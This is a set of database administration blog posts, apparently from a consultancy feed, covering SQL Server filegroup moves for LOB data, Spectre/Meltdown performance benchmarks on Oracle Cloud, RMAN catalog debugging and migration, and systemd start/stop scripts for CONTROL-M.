In fact, only data in IN_ROW_DATA allocation units moved from the PRIMARY to FG1 filegroup. In this context, moving LOB data is a non-trivial operation and I had to use a solution based on one proposed here by Kimberly L. Tripp from SQLSkills (definitely one of my favorite sources for tricky scenarios). So partitioning is the way to go. In respect of the solution fom SQLSkills I created a temporary partition function and scheme as shown below:

SELECT MAX([TransactionID])
FROM dbo.bigTransactionHistory2
-- 6910883
GO


CREATE PARTITION FUNCTION pf_bigTransaction_history2_temp (BIGINT)
AS RANGE RIGHT FOR VALUES (6920000)
GO

CREATE PARTITION SCHEME ps_bigTransaction_history2_temp
AS PARTITION pf_bigTransaction_history2_temp
TO ( [FG1], [PRIMARY] )
GO

Applying the scheme to the dbo.bigTransactionHistory2 table will allow us to move all data (IN_ROW_DATA and LOB_DATA) from the PRIMARY to FG1 filegroup as shown below:

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionID] ASC )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON ps_bigTransaction_history2_temp ([TransactionID])

Looking quickly at the storage configuration confirms this time all data moved to the right FG1.

blog 125 - 5 - bigTransactionHistory2 partitioning

Let’s finally remove the temporary partitioning configuration from the table (remember that all operations are performed ONLINE)

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionID] ASC )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON [FG1]

-- Remove underlying partition configuration
DROP PARTITION SCHEME ps_bigTransaction_history2_temp;
DROP PARTITION FUNCTION pf_bigTransaction_history2_temp;
GO

blog 125 - 6 - bigTransactionHistory2 last config

Finally, you can apply the same method for all non-clustered indexes that contain LOB data …

Cheers

 

 

 

 

 

 

 

 

Cet article Moving tables ONLINE on filegroup with constraints and LOB data est apparu en premier sur Blog dbi services.

Spectre and Meltdown on Oracle Public Cloud UEK

Sun, 2018-01-14 14:12

In the last post I published the strange results I had when testing physical I/O with the latest Spectre and Meltdown patches. There is the logical I/O with SLOB cached reads.

Logical reads

I’ve run some SLOB cache reads with the latest patches, as well as with only KPTI disabled, and with KPTI, IBRS and IBPB disabled.
I am on the Oracle Public Cloud DBaaS with 4 OCPU

DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 670,001.2
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 671,145.4
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 672,464.0
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 685,706.7 nopti
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 689,291.3 nopti
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 689,386.4 nopti
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 699,301.3 nopti noibrs noibpb
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 704,773.3 nopti noibrs noibpb
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 704,908.2 nopti noibrs noibpb

This is what I expected: when disabling the mitigation for Meltdown (PTI), and for some of the Spectre (IBRS and IBPB), I have a slightly better performance – about 5%. This is with only one SLOB session.

However, with 2 sessions I have something completely different:

DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,235,637.8 nopti noibrs noibpb
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,237,689.6 nopti
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,243,464.3 nopti noibrs noibpb
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,247,257.4 nopti
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,247,257.4 nopti noibrs noibpb
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,251,485.1
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,253,477.0
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,271,986.7

This is not a saturation situation here. My VM shape is 4 OCPUs, which is supposed to be the equivalent of 4 hyperthreaded cores.

And this figure is even worse with 4 sessions (all cores used) and more:

DB Time(s) : 4.0 DB CPU(s) : 4.0 Logical read (blocks) : 2,268,272.3 nopti noibrs noibpb
DB Time(s) : 4.0 DB CPU(s) : 4.0 Logical read (blocks): 2,415,044.8


DB Time(s) : 6.0 DB CPU(s) : 6.0 Logical read (blocks) : 3,353,985.7 nopti noibrs noibpb
DB Time(s) : 6.0 DB CPU(s) : 6.0 Logical read (blocks): 3,540,736.5


DB Time(s) : 8.0 DB CPU(s) : 7.9 Logical read (blocks) : 4,365,752.3 nopti noibrs noibpb
DB Time(s) : 8.0 DB CPU(s) : 7.9 Logical read (blocks): 4,519,340.7

The graph from those is here:
CaptureOPCLIO001

If I compare with the Oracle PaaS I tested last year (https://blog.dbi-services.com/oracle-public-cloud-liops-with-4-ocpu-in-paas/) which was on Intel(R) Xeon(R) CPU E5-2690 v2 @ 3.00GHz you can also see a nice improvement here on Intel(R) Xeon(R) CPU E5-2699C v4 @ 2.20GHz.

This test was on 4.1.12-112.14.10.el7uek.x86_64 and Oracle Linux has now released a new update: 4.1.12-112.14.11.el7uek

 

Cet article Spectre and Meltdown on Oracle Public Cloud UEK est apparu en premier sur Blog dbi services.

Spectre/Meltdown on Oracle Public Cloud UEK – PIO

Sat, 2018-01-13 10:24

The Spectre and Meltdown is now in the latest Oracle UEK kernel, after updating it with ‘yum update':

[opc@PTI ~]$ rpm -q --changelog kernel-uek
| awk '/CVE-2017-5715|CVE-2017-5753|CVE-2017-5754/{print $NF}' | sort | uniq -c
43 {CVE-2017-5715}
16 {CVE-2017-5753}
71 {CVE-2017-5754}

As I did on the previous post on AWS, I’ve run quick tests on the Oracle Public Cloud.

Physical reads

I’ve run some SLOB I/O reads with the patches, as well sit KPTI disabled, and with KPTI, IBRS and IBPB disabled.

And I was quite surprised by the result:


DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 23,335.6 nopti
DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 23,420.3 nopti
DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 24,857.6
DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 25,332.1


DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 39,857.7 nopti
DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 40,088.4 nopti
DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 40,627.0
DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 40,707.5


DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 47,491.4 nopti
DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 47,491.4 nopti
DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 49,438.2
DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 49,764.5


DB Time(s) : 8.0 DB CPU(s) : 1.2 Read IO requests : 54,227.9 nopti
DB Time(s) : 8.0 DB CPU(s) : 1.2 Read IO requests : 54,582.9 nopti
DB Time(s) : 8.0 DB CPU(s) : 1.3 Read IO requests : 57,288.6
DB Time(s) : 8.0 DB CPU(s) : 1.4 Read IO requests : 57,057.2

Yes. I all tests that I’ve done, the IOPS is higher with KPTI enabled vs. when booting the kernel with the nopti option. Here is a graph with those numbers:

CaptureOPCPIO001

I did those tests on the Oracle Cloud because I know that we have very fast I/O here, in hundreds of milliseconds, probably all cached in the storage:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Total Wait Avg % DB Wait
Event Waits Time (sec) Wait time Class
------------------------------ ----------- ---------- --------- ------ --------
db file parallel read 196,921 288.8 1.47ms 48.0 User I/O
db file sequential read 581,073 216.3 372.31us 36.0 User I/O
DB CPU 210.5 35.0
 
% of Total Waits
----------------------------------------------- Waits
Total 1ms
Event Waits <8us <16us <32us <64us <128u <256u =512 Event to 32m <512 <1ms <2ms <4ms <8ms <16ms =32m
------------------------- ------ ----- ----- ----- ----- ----- ----- ----- ----- ------------------------- ------ ----- ----- ----- ----- ----- ----- ----- -----
db file parallel read 196.9K .0 1.0 99.0 db file parallel read 194.9K 1.0 15.4 74.7 8.5 .3 .1 .0 .0
db file sequential read 581.2K 17.3 69.5 13.3 db file sequential read 77.2K 86.7 10.7 2.3 .2 .1 .0 .0 .0
 

So what?

I expected to have higher IOPS when disabling the page table isolation, because of the overhead of context switches. And it is the opposite here. Maybe this is because I have a very small SGA (because my goal is to have only physical reads). Note also that, as far as I know, only my guest OS has been patched for Meltdown and Spectre. We will see if the numbers are different after the next Oracle Cloud maintenance.

 

Cet article Spectre/Meltdown on Oracle Public Cloud UEK – PIO est apparu en premier sur Blog dbi services.

RMAN debugging during catalog import

Fri, 2018-01-12 09:36

In this post I would like to share how I have been able to troubleshoot and solve a catalog import issue using RMAN debug function.

As we can see, the error message provided by RMAN is not very helpful.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

connected to recovery catalog database

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 14:11:45
connected to source recovery catalog database
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of import catalog command at 01/05/2018 14:11:46
RMAN-06004: ORACLE error from recovery catalog database: ORA-00933: SQL command not properly ended

RMAN>

 

Instead of looking for possible more information in appropriate logs, we can easily use the RMAN debug function.

RMAN> debug on;

 

By running the import command again we will be able to extract below useful information on the command RMAN is complaining about.

DBGSQL:           CREATE DATABASE LINK
DBGSQL:            RCAT11G.IT.DBI-SERVICES.COM
DBGSQL:            CONNECT
DBGSQL:              TO
DBGSQL:            "RCAT"
DBGSQL:            IDENTIFIED BY
DBGSQL:            "manager"
DBGSQL:            USING
DBGSQL:            'RCAT11G'
DBGSQL:
DBGSQL:              sqlcode = 933
DBGSQL:           error: ORA-00933: SQL command not properly ended (krmkosqlerr)

 

Let’s run the command into a sqlplus session to understand the failure.

SQL> conn rcat/manager
Connected.
SQL> CREATE DATABASE LINK RCAT11G.IT.DBI-SERVICES.COM
CONNECT TO "RCAT" IDENTIFIED BY "manager"
USING 'RCAT11G';  2    3
CREATE DATABASE LINK RCAT11G.IT.DBI-SERVICES.COM
                                   *
ERROR at line 1:
ORA-00933: SQL command not properly ended

 

We can quickly understand that the ‘-‘ character is not appropriately used for domain name.

Let’s temporarily update needed parameters. An instance restart will be needed.

SQL> alter system set db_domain='dbiservices' scope=spfile;

System altered.

SQL> alter system set service_names='dbiservices' scope=both;

System altered.

SQL> alter database rename GLOBAL_NAME to "RCAT11G.dbiservices";

Database altered.

 

And our next import will be successful.

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 15:21:48
connected to source recovery catalog database
import validation complete
database unregistered from the source recovery catalog
Finished import catalog at 05-JAN-2018 15:21:52

RMAN>

 

We will be able to restore DB_DOMAIN, SERVICE_NAMES and GLOBAL_NAME to previous values, followed by a catalog instance restart.

 

Cet article RMAN debugging during catalog import est apparu en premier sur Blog dbi services.

ORACLE 11g to 12c RMAN catalog migration

Fri, 2018-01-12 09:36

This is a small migration demo of a 11g catalog (RCAT11G) to a new 12c catalog (RCAT12c).

Demo databases environments have been easily managed thanks to DBI DMK tool.

oracle@vmreforadg01:/home/oracle/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0 

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

 

Current configuration

Displaying the list of databases registered in the RCAT11g catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT11G

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME     RESETLOGS_CHANGE# RESETLOGS
---------- ---------- ---------- -------- ----------------- ---------
        41         42 3287252358 DB2TEST1                 1 05-JAN-18
         1          2   65811618 DB1TEST1                 1 05-JAN-18

 

Displaying the list of databases registered in the RCAT12c catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT12C

SQL>  select * from rcat.rc_database;

no rows selected

 

Verifying existing backup meta data on RCAT11g.

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

 

Migrating RCAT11g to RCAT12c

Importing RCAT11g catalog data into RCAT12c.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 13:39:56
connected to source recovery catalog database
PL/SQL package RCAT.DBMS_RCVCAT version 11.02.00.04 in IMPCAT database is too old
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of import catalog command at 01/05/2018 13:39:56
RMAN-06429: IMPCAT database is not compatible with this version of RMAN

 

When using IMPORT CATALOG, the version of the source recovery catalog schema must be equal to the current version of the destination recovery catalog schema. We, therefore, first need to upgrade RCAT11g catalog schema.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqlplus sys/manager@RCAT11G as sysdba
SQL*Plus: Release 12.2.0.1.0

SQL> @/oracle/u01/app/oracle/product/12.2.0/db_1_0/rdbms/admin/dbmsrmansys.sql

PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


PL/SQL procedure successfully completed.
oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman target sys/manager catalog rcat/manager@RCAT11G
Recovery Manager: Release 12.2.0.1.0

connected to target database: RCAT12C (DBID=426487514)
connected to recovery catalog database

RMAN> upgrade catalog;

recovery catalog owner is RCAT
enter UPGRADE CATALOG command again to confirm catalog upgrade

RMAN> upgrade catalog;

recovery catalog upgraded to version 12.02.00.01
DBMS_RCVMAN package upgraded to version 12.02.00.01
DBMS_RCVCAT package upgraded to version 12.02.00.01.

 

Verifying new version of RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqlplus rcat/manager
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcver;

VERSION
------------
12.02.00.01

 

Importing RCAT11g catalog data into RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

connected to recovery catalog database

RMAN> list db_unique_name all;


RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 15:21:48
connected to source recovery catalog database
import validation complete
database unregistered from the source recovery catalog
Finished import catalog at 05-JAN-2018 15:21:52

RMAN> list db_unique_name all;


List of Databases
DB Key  DB Name  DB ID            Database Role    Db_unique_name
------- ------- ----------------- ---------------  ------------------
2       DB1TEST1 65811618         PRIMARY          DB1TEST11G
42      DB2TEST1 3287252358       PRIMARY          DB2TEST11G

 

Verifying new configuration

Displaying the list of databases registered in the RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcat.rc_database;

no rows selected

SQL> select db_name, name from rcat.rc_datafile;

no rows selected

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

no rows selected

 

Displaying the list of databases registered in the RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME                          RESETLOGS_CHANGE# RESETLOGS FINAL_CHANGE#
---------- ---------- ---------- ----------------------------- ----------------- --------- -------------
        42         43 3287252358 DB2TEST1                                      1 05-JAN-18
         2          3   65811618 DB1TEST1                                      1 05-JAN-18

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

24 rows selected.

 

Checking new backup meta data to be recorded in RCAT12c catalog

Generating a new backup.

oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] export NLS_DATE_FORMAT="DD/MM/YYYY HH24:MI:SS"
oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] rmanh
Recovery Manager: Release 11.2.0.4.0

RMAN> connect target /

connected to target database: DB2TEST1 (DBID=3287252358)

RMAN> connect catalog rcat/manager@rcat12c

connected to recovery catalog database

RMAN> backup database plus archivelog;

Starting backup at 05/01/2018 15:51:14
current log archived
allocated channel: ORA_DISK_1
channel ORA_DISK_1: SID=32 device type=DISK
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=32 RECID=1 STAMP=964611118
input archived log thread=1 sequence=33 RECID=2 STAMP=964611131
input archived log thread=1 sequence=34 RECID=3 STAMP=964625616
input archived log thread=1 sequence=35 RECID=4 STAMP=964625629
input archived log thread=1 sequence=36 RECID=5 STAMP=964626674
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:16
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:17
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155116_f4z474b0_.bkp tag=TAG20180105T155116 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:17

Starting backup at 05/01/2018 15:51:17
using channel ORA_DISK_1
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
input datafile file number=00001 name=/u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
input datafile file number=00003 name=/u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
input datafile file number=00002 name=/u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
input datafile file number=00004 name=/u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:18
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:25
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_nnndf_TAG20180105T155117_f4z476gv_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:07
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
including current control file in backup set
including current SPFILE in backup set
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:26
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:27
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_ncsnf_TAG20180105T155117_f4z47glg_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:27

Starting backup at 05/01/2018 15:51:27
current log archived
using channel ORA_DISK_1
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=37 RECID=6 STAMP=964626687
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:28
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:29
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155128_f4z47jn7_.bkp tag=TAG20180105T155128 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:29

 

Verifying backup set in new RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select sysdate from dual;

SYSDATE
-------------------
05/01/2018 15:53:16

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
        42 3287252358 05/01/2018 15:51:16 05/01/2018 15:51:16
        42 3287252358 05/01/2018 15:51:18 05/01/2018 15:51:21
        42 3287252358 05/01/2018 15:51:25 05/01/2018 15:51:26
        42 3287252358 05/01/2018 15:51:28 05/01/2018 15:51:28
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

28 rows selected.

 

 

 

Cet article ORACLE 11g to 12c RMAN catalog migration est apparu en premier sur Blog dbi services.

Automatic start/stop for CONTROL-M v9

Fri, 2018-01-12 09:35

In this post, I would like to share how to implement automatic Start and Stop for CONTROL-M/Server, CONTROL-M/Agent and CONTROL-M/EM running on Oracle linux 7 individual servers, by implementing some updates in the existing BMC procedure and script.
The CONTROL-M should be running version 9 and we are using the internal PostgreSQL database.
The user created for CONTROL-M/Server and CONTROL-M/Agent environment is ctmuser, the user created for CONTROL-M/EM environment is emuser.

BMC CONTROL-M Workload Automation documentation

CONTROL-M/Server

With ctmuser, update existing rc.ctmuser file provided with the BMC distribution by adding the start_ctm part. /home/ctmuser is the home directory of the installation. This command was missing from the existing script, and will guarantee a proper startup of the CONTROL-M Server. The rc.ctmuser script content will then be as following.

    ctmsrv% cat /home/ctmuser/ctm_server/data/rc.ctmuser

    # start database at boot
    su - ctmuser -c dbversion
    if [ $? -eq 0 ] ; then
      echo "SQL Server is already running "
    else
      if [ -f /home/ctmuser/ctm_server/scripts/startdb ]; then
      echo "Starting SQL server for CONTROL-M"
      su - ctmuser -c startdb
      echo "Sleeping for 20"
      sleep 20
      fi
    fi

    # start CONTROL-M Server at boot
    if [ -f /home/ctmuser/ctm_server/scripts/start_ctm ]; then
    echo "Starting CONTROL-M Server"
    su - ctmuser -c /home/ctmuser/ctm_server/scripts/start_ctm &
    sleep 5
    fi

    # start CONTROL-M Configuration Agent at boot
    if [ -f /home/ctmuser/ctm_server/scripts/start_ca ]; then
    echo "Starting CONTROL-M Server Configuration Agent"
    su - ctmuser -c /home/ctmuser/ctm_server/scripts/start_ca &
    sleep 5
    fi

    exit 0

    ctmsrv%

 

The existing BMC procedure does not include any script to be run when the service or the physical server is shutdown. Processes will then simply be killed, which will not guarantee a proper stop of the application and most important the internal PostgreSQL database.
With ctmuser, create a new rc file for stop purpose. Let’s name the file rc.stop.ctmuser and have it located in same /home/ctmuser/ctm_server/data directory. The file content will be the following.

    ctmsrv% cat /home/ctmuser/ctm_server/data/rc.stop.ctmuser
    # stop CONTROL-M Configuration Agent at poweroff/reboot
    if [ -f /home/ctmuser/ctm_server/scripts/shut_ca ]; then
      echo "Stopping CONTROL-M Server Configuration Agent"
      su - ctmuser -c /home/ctmuser/ctm_server/scripts/shut_ca &
      sleep 5
    fi

    # stop CONTROL-M Server at poweroff/reboot
    if [ -f /home/ctmuser/ctm_server/scripts/shut_ctm ]; then
      echo "Stopping CONTROL-M Server"
      su - ctmuser -c /home/ctmuser/ctm_server/scripts/shut_ctm &
      sleep 5
    fi

    # stop database at poweroff/reboot
    if [ -f /home/ctmuser/ctm_server/scripts/shutdb ]; then
      echo "Stopping SQL server for CONTROL-M"
      su - ctmuser -c shutdb
      echo "Sleeping for 20"
      sleep 20
    fi


    exit 0

 

With root privileges, create the service file as below. We will be adding the ExecStop part additionnaly to the existing BMC procedure.

    [root@ctmsrv system]# cat /etc/systemd/system/ctmserver.service
    [Unit]
    Description=CONTROL-M Server
    After=systemd-user-sessions.service multi-user.target network.target
    [Service]
    ExecStart=/bin/sh -c /home/ctmuser/ctm_server/data/rc.ctmuser
    ExecStop=/bin/sh -c /home/ctmuser/ctm_server/data/rc.stop.ctmuser
    Type=forking
    RemainAfterExit=yes
    [Install]
    WantedBy=multi-user.target

 

Give appropriate file permissions and enable the service. A system reboot will be necessary.

    [root@ctmsrv system]# chmod 644 ctmserver.service
    [root@ctmsrv system]# systemctl daemon-reload
    [root@ctmsrv system]# systemctl enable ctmserver.service
    Created symlink from /etc/systemd/system/multi-user.target.wants/ctmserver.service
      to /etc/systemd/system/ctmserver.service.
    [root@ctmsrv system]# systemctl reboot

 

A well-functioning test can be performed by running service ctmserver stop/start with root privileges and monitoring results of :

  • watch ‘ps -ef | grep ctm’
  • ctm_menu
  • service ctmserver status
 CONTROL-M/Agent

For the Agent we will apply the existing BMC procedure.
With root privileges, create the service file as described  below.

    [root@ctmagtli1 system]# cat /etc/systemd/system/ctmag.service
    [Unit]
    Description=CONTROL-M Agent
    [Service]
    Type=forking
    RemainAfterExit=yes
    ExecStart=/home/ctmuser/ctmagent/ctm/scripts/rc.agent_user start
    ExecStop=/home/ctmuser/ctmagent/ctm/scripts/rc.agent_user stop
    [Install]
    WantedBy=multi-user.target

 

Give appropriate file permissions and enable the service. A system reboot will be necessary.

